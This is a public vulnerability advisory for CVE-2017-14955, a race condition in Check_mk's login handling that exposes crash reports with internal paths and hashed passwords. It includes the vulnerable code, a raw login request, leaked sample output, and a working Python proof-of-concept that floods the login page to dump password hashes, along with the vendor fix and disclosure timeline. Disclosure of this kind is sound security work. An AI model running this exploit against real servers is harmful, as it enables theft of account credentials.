1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209 | 1. ADVISORY INFORMATION
=======================
Product: Check_mk
Vendor URL: https://mathias-kettner.de/check_mk.html
Type: Race Condition [CWE-362]
Date found: 2017-09-21
Date published: 2017-10-18
CVSSv3 Score: 7.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
CVE: CVE-2017-14955
2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
3. VERSIONS AFFECTED
====================
Check_mk v1.2.8p25
Check_mk v1.2.8p25 Enterprise
older versions may be affected too.
4. INTRODUCTION
===============
Check_MK is comprehensive IT monitoring solution in the tradition of Nagios.
Check_MK is available as Raw Edition, which is 100% pure open source, and as
Enterprise Edition with a lot of additional features and professional support.
(from the vendor's homepage)
5. VULNERABILITY DETAILS
========================
Check_mk is vulnerable to an unauthenticated information disclosure through a
race condition during the authentication process when trying to authenticate
with a valid username and an invalid password.
On a failed login, the application calls the function save_users(), which
performs two os.rename operations on the files "contacts.mk.new" and
"users.mk.new" (see /packages/check_mk/check_mk-1.2.8p25/web/htdocs/userdb.py):
[..]
# Check_MK's monitoring contacts
filename = root_dir + "contacts.mk.new"
out = create_user_file(filename, "w")
out.write("# Written by Multisite UserDB\n# encoding: utf-8\n\n")
out.write("contacts.update(\n%s\n)\n" % pprint.pformat(contacts))
out.close()
os.rename(filename, filename[:-4])
# Users with passwords for Multisite
filename = multisite_dir + "users.mk.new"
make_nagios_directory(multisite_dir)
out = create_user_file(filename, "w")
out.write("# Written by Multisite UserDB\n# encoding: utf-8\n\n")
out.write("multisite_users = \\\n%s\n" % pprint.pformat(users))
out.close()
os.rename(filename, filename[:-4])
[...]
When sending many concurrent authentication requests with an existing/valid
username, such as:
POST /check_mk/login.py HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---9519178121294961341040589727
Content-Length: 772
Connection: close
Upgrade-Insecure-Requests: 1
---9519178121294961341040589727
Content-Disposition: form-data; name="filled_in"
login
---9519178121294961341040589727
Content-Disposition: form-data; name="_login"
1
---9519178121294961341040589727
Content-Disposition: form-data; name="_origtarget"
index.py
---9519178121294961341040589727
Content-Disposition: form-data; name="_username"
omdadmin
---9519178121294961341040589727
Content-Disposition: form-data; name="_password"
welcome
---9519178121294961341040589727
Content-Disposition: form-data; name="_login"
Login
---9519178121294961341040589727--
Then it could happen that one of both os.rename() calls references a non-
existing file, which has just been renamed by a previous thread. This causes the
Python script to fail and throw a crash report, which discloses a variety of
sensitive information, such as internal server paths, account details including
hashed passwords:
</pre></td></tr><tr class="data odd0"><td class="left">Local Variables</td><td><pre>{'contacts': {u'admin': {'alias': u'Administrator',
'contactgroups': ['all'],
'disable_notifications': False,
'email': u'admin@example.com',
'enforce_pw_change': False,
'last_pw_change': 0,
'last_seen': 0.0,
'locked': False,
'num_failed': 0,
'pager': '',
'password': '$1$400000$13371337asdfasdf',
'roles': ['admin'],
'serial': 2},
A script to automatically exploit this vulnerability can be found on [0].
6. POC
======
#!/usr/bin/python
# Exploit Title: Check_mk <=3D v1.2.8p25 save_users() Race Condition
# Version: <=3D 1.2.8p25
# Date: 2017-10-18
# Author: Julien Ahrens (@MrTuxracer)
# Homepage: https://www.rcesecurity.com
# Software Link: https://mathias-kettner.de/check_mk.html
# Tested on: 1.2.8p25
# CVE:=09=09 CVE-2017-14955
#
# Howto / Notes:
# This scripts exploits the Race Condition in check_mk version 1.2.8p25 and
# below as described by CVE-2017-14955. You only need a valid username to
# dump all encrypted passwords and make sure to setup a local proxy to
# catch the dump. Happy brute forcing ;-)
import requests
import threading
try:
=09from requests.packages.urllib3.exceptions import InsecureRequestWarning
=09requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
except:
=09pass
# Config Me
target_url =3D "https://localhost/check_mk/login.py"
target_username =3D "omdadmin"
proxies =3D {
'http': 'http://127.0.0.1:8080',
'https': 'http://127.0.0.1:8080',
}
def make_session():
=09v =3D requests.post(target_url, verify=3DFalse, proxies=3Dproxies, files=
=3D{'filled_in': (None, 'login'), '_login': (None, '1'), '_origtarget': (No=
ne, 'index.py'), '_username': (None, target_username), '_password': (None, =
'random'), '_login': (None, 'Login')})
=09return v.content
NUM =3D 50
threads =3D []
for i in range(NUM):
t =3D threading.Thread(target=3Dmake_session)
threads.append(t)
t.start()
7. RISK
=======
To successfully exploit this vulnerability an unauthenticated attacker must only
have network-level access to the application.
The vulnerability allows remote attackers to trigger an exception, which
discloses a variety of sensitive internal information such as:
- Local server paths
- Usernames
- Passwords (hashed)
- and user directory-specific attributes (i.e. LDAP)
8. SOLUTION
===========
Update to 1.2.8p26.
9. REPORT TIMELINE
==================
2017-09-21: Discovery of the vulnerability
2017-09-21: Sent limited information to publicly listed email address
2017-09-21: Vendor responds and asks for details
2017-09-21: Full vulnerability details sent to vendor
2017-09-25: Vendor pushes fix to git
2017-10-01: MITRE assigns CVE-2017-14955
2017-10-16: Fix confirmed
2017-10-18: Public disclosure
10. REFERENCES
=============
[0] https://www.rcesecurity.com/2017/10/cve-2017-14955-win-a-race-against-check-mk-to-dump-all-your-login-data/
[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14955
|